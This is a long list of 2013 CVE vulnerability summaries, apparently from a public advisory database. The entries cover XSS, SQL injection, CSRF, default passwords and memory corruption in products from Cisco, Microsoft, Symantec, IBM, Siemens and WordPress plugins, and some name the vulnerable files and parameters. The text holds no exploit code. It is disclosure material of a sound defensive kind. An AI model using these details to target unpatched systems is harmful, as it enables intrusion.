PHPUnit extension before 3.5.15 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4733] The web server on the Digital Alert Systems DASDEC EAS device before 2.0-2 and the Monroe Electronics R189 One-Net EAS device before 2.0-2 allows remote attackers to obtain sensitive configuration and status information by reading log files. [CVE-2013-4732] DISPUTED The administrative web server on the Digital Alert Systems DASDEC EAS device through 2.0-2 and the Monroe Electronics R189 One-Net EAS device through 2.0-2 uses predictable session ID values, which makes it easier for remote attackers to hijack sessions by sniffing the network. NOTE: VU#662676 states "Monroe Electronics could not reproduce this finding." [CVE-2013-4680] Open redirect vulnerability in Maag Form Captcha extension 2.0.0 and earlier for TYPO3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2013-4676] Multiple cross-site scripting (XSS) vulnerabilities in Symantec Backup Exec 2010 R3 before 2010 R3 SP3 and 2012 before SP2 allow remote attackers to inject arbitrary web script or HTML via vectors involving a (1) custom-reports generation page, (2) Storage Devices creation page, or (3) jobs creation page in the management console [CVE-2013-4674] Cross-site scripting (XSS) vulnerability in the Web Email Protection component in Symantec Encryption Management Server (formerly Symantec PGP Universal Server) before 3.3.0 MP2 allows remote authenticated users to inject arbitrary web script or HTML via a crafted encrypted e-mail attachment. [CVE-2013-4673] The management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 does not properly implement RADIUS authentication, which allows remote attackers to execute arbitrary code by leveraging access to the login prompt. [CVE-2013-4672] The management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 has an incorrect sudoers file, which allows local users to bypass intended access restrictions via a command. [CVE-2013-4671] Cross-site request forgery (CSRF) vulnerability in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors. [CVE-2013-4670] Multiple cross-site scripting (XSS) vulnerabilities in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4652] Unspecified vulnerability in the command-line management interface on Siemens Scalance W7xx devices with firmware before 4.5.4 allows remote attackers to bypass authentication and execute arbitrary code via a (1) SSH or (2) TELNET connection. [CVE-2013-4625] Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. [CVE-2013-4619] Multiple SQL injection vulnerabilities in OpenEMR 4.1.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) start or (2) end parameter to interface/reports/custom_report_range.php, or the (3) form_newid parameter to custom/chart_tracker.php. [CVE-2013-4613] The default configuration of the administrative interface on the Canon MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920, and MX922 printers does not require authentication, which allows remote attackers to modify the configuration by visiting the Advanced page. NOTE: the vendor has apparently responded by stating "for user convenience, the default setting does not require a password. However, if a user has a particular concern about third parties accessing the user's home printer, the default setting can be changed to add a password." [CVE-2013-4612] Multiple cross-site scripting (XSS) vulnerabilities in REDCap before 5.1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving different modules. [CVE-2013-4608] Cross-site scripting (XSS) vulnerability in REDCap before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via vectors involving the Graphical Data View & Descriptive Stats page. [CVE-2013-4600] Multiple cross-site scripting (XSS) vulnerabilities in Alkacon OpenCms before 8.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to system/workplace/views/admin/admin-main.jsp or the (2) requestedResource parameter to system/login/index.html. [CVE-2013-4140] Cross-site scripting (XSS) vulnerability in the TinyBox (Simple Splash) module before 7.x-2.2 for Drupal allows remote authenticated users with the "administer tinybox" permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-4117] Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. [CVE-2013-4092] The SecureSphere Operations Manager (SOM) Management Server in Imperva SecureSphere 9.0.0.5 allows context-dependent attackers to obtain sensitive information by leveraging the presence of (1) a session ID in the jsessionid field to secsphLogin.jsp or (2) credentials in the j_password parameter to j_acegi_security_check, and reading (a) web-server access logs, (b) web-server Referer logs, or (c) the browser history. [CVE-2013-4038] The Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers uses cleartext for password storage, which allows context-dependent attackers to obtain sensitive information by reading a file. [CVE-2013-4037] The RAKP protocol support in the Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) and Integrated Management Module II (IMM2) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers sends a password hash to the client, which makes it easier for remote attackers to obtain access via a brute-force attack. [CVE-2013-4031] The Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) and Integrated Management Module II (IMM2) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers has a default password for the IPMI user account, which makes it easier for remote attackers to perform power-on, power-off, or reboot actions, or add or modify accounts, via unspecified vectors. [CVE-2013-3999] Cross-site scripting (XSS) vulnerability in IBM Social Media Analytics 1.2 before FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3996] IBM InfoSphere BigInsights 1.1 through 2.1 does not properly handle FRAME elements, which makes it easier for remote authenticated users to conduct phishing attacks via a crafted web site. [CVE-2013-3995] Cross-site scripting (XSS) vulnerability in IBM InfoSphere BigInsights 1.1 through 2.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3990] Cross-site scripting (XSS) vulnerability in the MIME e-mail functionality in iNotes in IBM Domino 9.0 before IF3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPR PTHN98FLQ2. [CVE-2013-3979] Multiple cross-site scripting (XSS) vulnerabilities in the help pages in Web\Content\Help\ in the Web Client in IBM Cognos Command Center (aka Star Command Center or Star Analytics) before 10.1, when Internet Explorer is used, allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3959] The Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, exhibits different behavior for NetBIOS user names depending on whether the user account exists, which allows remote authenticated users to enumerate account names via crafted URL parameters. [CVE-2013-3958] The login implementation in the Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, has a hardcoded account, which makes it easier for remote attackers to obtain access via an unspecified request. [CVE-2013-3957] SQL injection vulnerability in the login screen in the Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2013-3822] Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote attackers to affect integrity via unknown vectors related to Web Client (CS). [CVE-2013-3791] Unspecified vulnerability in Enterprise Manager (EM) Base Platform 10.2.0.5 and EM DB Control 11.1.0.7 in Oracle Enterprise Manager Grid Control allows remote attackers to affect integrity via unknown vectors related to User Interface Framework. [CVE-2013-3782] Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization 4.6 prior to 4.63 and 4.7 prior to 4.71 allows remote attackers to affect integrity via unknown vectors related to Web UI. [CVE-2013-3779] Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization All 4.6 releases including 4.63 and 4.7 prior to 4.71 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web UI. [CVE-2013-3772] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote attackers to affect integrity via unknown vectors related to Web Forms. [CVE-2013-3770] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Content Server. [CVE-2013-3769] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote attackers to affect integrity via unknown vectors related to Site Studio. [CVE-2013-3742] Cross-site scripting (XSS) vulnerability in view_create.php (aka the Create View page) in phpMyAdmin 4.x before 4.0.3 allows remote authenticated users to inject arbitrary web script or HTML via an invalid SQL CREATE VIEW statement with a crafted name that triggers an error message. [CVE-2013-3735] DISPUTED The Zend Engine in PHP before 5.4.16 RC1, and 5.5.0 before RC2, does not properly determine whether a parser error occurred, which allows context-dependent attackers to cause a denial of service (memory consumption and application crash) via a crafted function definition, as demonstrated by an attack within a shared web-hosting environment. NOTE: the vendor's http://php.net/security-note.php page says "for critical security situations you should be using OS-level security by running multiple web servers each as their own user id." [CVE-2013-3720] Cross-site scripting (XSS) vulnerability in widget_remove.php in the Feedweb plugin before 1.9 for WordPress allows remote authenticated administrators to inject arbitrary web script or HTML via the wp_post_id parameter. [CVE-2013-3719] Cross-site scripting (XSS) vulnerability in the aiContactSafe component before 2.0.21 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3653] Multiple cross-site scripting (XSS) vulnerabilities in the RecommendSearch feature in the management screen in LOCKON EC-CUBE before 2.12.5 allow remote attackers to inject arbitrary web script or HTML via vectors involving the rank parameter, a different vulnerability than CVE-2013-3652. [CVE-2013-3652] Cross-site scripting (XSS) vulnerability in data/class/pages/products/LC_Page_Products_List.php in LOCKON EC-CUBE 2.11.0 through 2.12.4 allows remote attackers to inject arbitrary web script or HTML via vectors involving the classcategory_id2 field, a different vulnerability than CVE-2013-3653. [CVE-2013-3649] Cross-site scripting (XSS) vulnerability in KENT-WEB CLIP-MAIL before 3.4, when Internet Explorer 7 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an unspecified form field. [CVE-2013-3648] Cross-site scripting (XSS) vulnerability in KENT-WEB POST-MAIL before 6.7, when Internet Explorer 7 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an unspecified form field. [CVE-2013-3647] The WebView class in the Cybozu Live application before 2.0.1 for Android allows attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL. NOTE: this vulnerability exists because of a CVE-2012-4009 regression. [CVE-2013-3646] The Cybozu Live application before 2.0.1 for Android allows remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site. NOTE: this vulnerability exists because of a CVE-2012-4008 regression. [CVE-2013-3645] Cross-site scripting (XSS) vulnerability in the Orchard.Comments module in Orchard before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3643] The Galapagos Browser application for Android does not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application. [CVE-2013-3642] The Angel Browser application 1.47b and earlier for Android 1.6 through 2.1, 1.62b and earlier for Android 2.2 through 2.3.4, 1.68b and earlier for Android 3.0 through 4.0.3, and 1.76b and earlier for Android 4.1 through 4.2 does not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application. [CVE-2013-3640] Cross-site scripting (XSS) vulnerability in the Instant Web Publish function in FileMaker Pro before 12 and Pro Advanced before 12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3562] Multiple integer signedness errors in the tvb_unmasked function in epan/dissectors/packet-websocket.c in the Websocket dissector in Wireshark 1.8.x before 1.8.7 allow remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2013-3561] Multiple integer overflows in Wireshark 1.8.x before 1.8.7 allow remote attackers to cause a denial of service (loop or application crash) via a malformed packet, related to a crash of the Websocket dissector, an infinite loop in the MySQL dissector, and a large loop in the ETCH dissector. [CVE-2013-3538] Multiple cross-site scripting (XSS) vulnerabilities in todooforum.php in Todoo Forum 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id_post or (2) pg parameter. [CVE-2013-3535] Multiple cross-site scripting (XSS) vulnerabilities in CMSLogik 1.2.0 and 1.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) admin_email, (2) header_title, (3) site_title parameter to admin/settings [CVE-2013-3534] Cross-site scripting (XSS) vulnerability in the aiContactSafe component before 2.0.21 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3532] SQL injection vulnerability in settings.php in the Web Dorado Spider Video Player plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the theme parameter. [CVE-2013-3529] Multiple cross-site scripting (XSS) vulnerabilities in user/obits.php in the WP FuneralPress plugin before 1.1.7 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) message, (2) photo-message, or (3) youtube-message parameter. [CVE-2013-3526] Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter. [CVE-2013-3515] Multiple cross-site scripting (XSS) vulnerabilities in OpenX Source 2.8.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) package parameter to www/admin/plugin-index.php or the (2) group parameter to www/admin/plugin-settings.php. [CVE-2013-3511] Open redirect vulnerability in the NeDi component in GroundWork Monitor Enterprise 6.7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2013-3501] Multiple cross-site scripting (XSS) vulnerabilities in GroundWork Monitor Enterprise 6.7.0 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the foundation-webapp/admin/ directory, (2) the NeDi component, or (3) the Noma component. [CVE-2013-3498] Cross-site scripting (XSS) vulnerability in Juniper SmartPass WLAN Security Management before 7.7 MR3 and 8.0 before MR2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3450] Cross-site request forgery (CSRF) vulnerability in the User WebDialer page in Cisco Unified Communications Manager (Unified CM) allows remote attackers to hijack the authentication of arbitrary users for requests that dial calls, aka Bug ID CSCui13028. [CVE-2013-3448] Cisco WebEx Meetings Server does not check whether a user account is active, which allows remote authenticated users to bypass intended access restrictions by performing meeting operations after account deactivation, aka Bug ID CSCuh33315. [CVE-2013-3444] The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1 [CVE-2013-3443] The web service framework in Cisco WAAS Software 4.x and 5.x before 5.0.3e, 5.1.x before 5.1.1c, and 5.2.x before 5.2.1 in a Central Manager (CM) configuration allows remote attackers to execute arbitrary code via a crafted POST request, aka Bug ID CSCuh26626. [CVE-2013-3442] The web portal in Cisco Unified Communications Manager (Unified CM) allows remote authenticated users to obtain sensitive stack-trace information via unspecified vectors that trigger a stack exception, aka Bug ID CSCug34854. [CVE-2013-3439] Cross-site scripting (XSS) vulnerability in Cisco Unified Operations Manager allows remote attackers to inject arbitrary web script or HTML via a crafted URL in an unspecified HTTP header field, aka Bug ID CSCud80182. [CVE-2013-3438] The web framework in the server in Cisco Unified MeetingPlace Web Conferencing allows remote attackers to bypass intended access restrictions and read unspecified web pages via crafted parameters, aka Bug ID CSCuh86385. [CVE-2013-3425] The Meeting Center component in Cisco WebEx 11 generates different error messages for invalid file-access attempts depending on whether a file exists, which allows remote authenticated users to enumerate files via a series of SPI calls, aka Bug ID CSCuc35965. [CVE-2013-3422] Cross-site scripting (XSS) vulnerability in Administration pages in Cisco Secure Access Control System (ACS) allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud75165. [CVE-2013-3421] Cross-site scripting (XSS) vulnerability in the Help index page in Cisco Secure Access Control System (ACS) allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud75170. [CVE-2013-3420] Cross-site request forgery (CSRF) vulnerability in the web framework on the Cisco Identity Services Engine (ISE) allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuh25506. [CVE-2013-3419] Cross-site scripting (XSS) vulnerability in Cisco Unified MeetingPlace Web Conferencing allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCuh74981. [CVE-2013-3418] Cisco Unified Communications Domain Manager does not properly allocate memory for GET and POST requests, which allows remote authenticated users to cause a denial of service (memory consumption and process crash) via crafted requests to the management interface, aka Bug ID CSCud22922. [CVE-2013-3416] Cross-site scripting (XSS) vulnerability in the web framework in the unified-communications management implementation in Cisco Unified Operations Manager and Unified Service Monitor allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug IDs CSCuh47574 and CSCuh95997. [CVE-2013-3414] Cross-site scripting (XSS) vulnerability in the WebVPN portal login page on Cisco Adaptive Security Appliances (ASA) devices allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCug83080. [CVE-2013-3413] Cross-site scripting (XSS) vulnerability in the search form in the administration/monitoring panel on the Cisco Identity Services Engine (ISE) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCuh87036. [CVE-2013-3405] The web portal in TC software on Cisco TelePresence endpoints does not require an exact password match during a login attempt by a user who has not configured a password, which allows remote attackers to bypass authentication by sending an arbitrary password, aka Bug ID CSCud96071. [CVE-2013-3398] The web framework in Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance provides different responses to requests for arbitrary pathnames depending on whether the pathname exists, which allows remote attackers to enumerate directories and files via a series of crafted requests, aka Bug ID CSCuh64574. [CVE-2013-3396] Cross-site scripting (XSS) vulnerability in the web framework in Cisco Content Security Management on Security Management Appliance (SMA) devices allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCuh24749. [CVE-2013-3395] Cross-site request forgery (CSRF) vulnerability in the web framework on Cisco IronPort Web Security Appliance (WSA) devices, Email Security Appliance (ESA) devices, and Content Security Management Appliance (SMA) devices allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCuh70263, CSCuh70323, and CSCuh26634. [CVE-2013-3392] Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco WebEx Social allow remote attackers to hijack the authentication of arbitrary users via unspecified vectors, aka Bug IDs CSCuh10405 and CSCuh10355. [CVE-2013-3386] The IronPort Spam Quarantine (ISQ) component in the web framework in IronPort AsyncOS on Cisco Email Security Appliance devices before 7.1.5-106 and 7.3, 7.5, and 7.6 before 7.6.3-019 and Content Security Management Appliance devices before 7.9.1-102 and 8.0 before 8.0.0-404 allows remote attackers to cause a denial of service (service crash or hang) via a high rate of TCP connection attempts, aka Bug IDs CSCzv25573 and CSCzv81712. [CVE-2013-3385] The management GUI in the web framework in IronPort AsyncOS on Cisco Web Security Appliance devices before 7.1.3-013, 7.5 before 7.5.0-838, and 7.7 before 7.7.0-602 [CVE-2013-3384] The web framework in IronPort AsyncOS on Cisco Web Security Appliance devices before 7.1.3-013, 7.5 before 7.5.0-838, and 7.7 before 7.7.0-550 [CVE-2013-3383] The web framework in IronPort AsyncOS on Cisco Web Security Appliance devices before 7.1.3-013, 7.5 before 7.5.0-838, and 7.7 before 7.7.0-550 allows remote authenticated users to execute arbitrary commands via crafted command-line input in a URL sent over IPv4, aka Bug ID CSCzv69294. [CVE-2013-3376] Open redirect vulnerability in the help page in Cisco Video Surveillance Operations Manager allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka Bug ID CSCty74490. [CVE-2013-3375] Cross-site scripting (XSS) vulnerability in the portal page in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCue23798. [CVE-2013-3350] Adobe ColdFusion 10 before Update 11 allows remote attackers to call ColdFusion Components (CFC) public methods via WebSockets. [CVE-2013-3275] EMC Avamar Server and Avamar Virtual Edition before 7.0 on Data Store Gen3, Gen4, and Gen4s platforms do not properly restrict use of FRAME elements, which makes it easier for remote attackers to obtain sensitive information via a crafted web site, related to "cross frame scripting vulnerabilities." [CVE-2013-3267] Cross-site scripting (XSS) vulnerability in the highlighter plugin in Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3262] Cross-site scripting (XSS) vulnerability in admin/admin.php in the Download Monitor plugin before 3.3.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the p parameter. [CVE-2013-3261] Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the GRAND FlAGallery plugin before 2.72 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter in a flag-manage-gallery action. [CVE-2013-3254] Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the WP Photo Album Plus plugin before 5.0.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the commentid parameter in a wppa_manage_comments edit action. [CVE-2013-3210] Opera before 12.15 does not properly block top-level domains in Set-Cookie headers, which allows remote attackers to obtain sensitive information by leveraging control of a different web site in the same top-level domain. [CVE-2013-3166] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to inject arbitrary web script or HTML via vectors involving incorrect auto-selection of the Shift JIS encoding, leading to cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability," a different vulnerability than CVE-2013-0015. [CVE-2013-3164] Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3163] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3151. [CVE-2013-3162] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3115. [CVE-2013-3161] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3143. [CVE-2013-3153] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3148. [CVE-2013-3152] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3146. [CVE-2013-3151] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3163. [CVE-2013-3150] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3145. [CVE-2013-3149] Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3148] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3153. [CVE-2013-3147] Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3146] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3152. [CVE-2013-3145] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3150. [CVE-2013-3144] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3151 and CVE-2013-3163. [CVE-2013-3143] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3161. [CVE-2013-3142] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3139. [CVE-2013-3141] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3110. [CVE-2013-3139] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3142. [CVE-2013-3126] Microsoft Internet Explorer 9 and 10, when script debugging is enabled, does not properly handle objects in memory during the processing of script, which allows remote attackers to execute arbitrary code via a crafted web site, aka "Internet Explorer Script Debug Vulnerability." [CVE-2013-3125] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3120. [CVE-2013-3124] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3122. [CVE-2013-3123] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3111. [CVE-2013-3122] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3124. [CVE-2013-3121] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3120] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3125. [CVE-2013-3119] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3114. [CVE-2013-3118] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3120 and CVE-2013-3125. [CVE-2013-3117] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3122 and CVE-2013-3124. [CVE-2013-3116] Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3115] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3162. [CVE-2013-3114] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3119. [CVE-2013-3113] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3112] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3113, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3111] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3123. [CVE-2013-3110] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3141. [CVE-2013-3079] VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remote authenticated users to execute arbitrary programs with root privileges by leveraging Virtual Appliance Management Interface (VAMI) access. [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests. [CVE-2013-3059] Cross-site scripting (XSS) vulnerability in the Voting plugin in Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-3058] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows 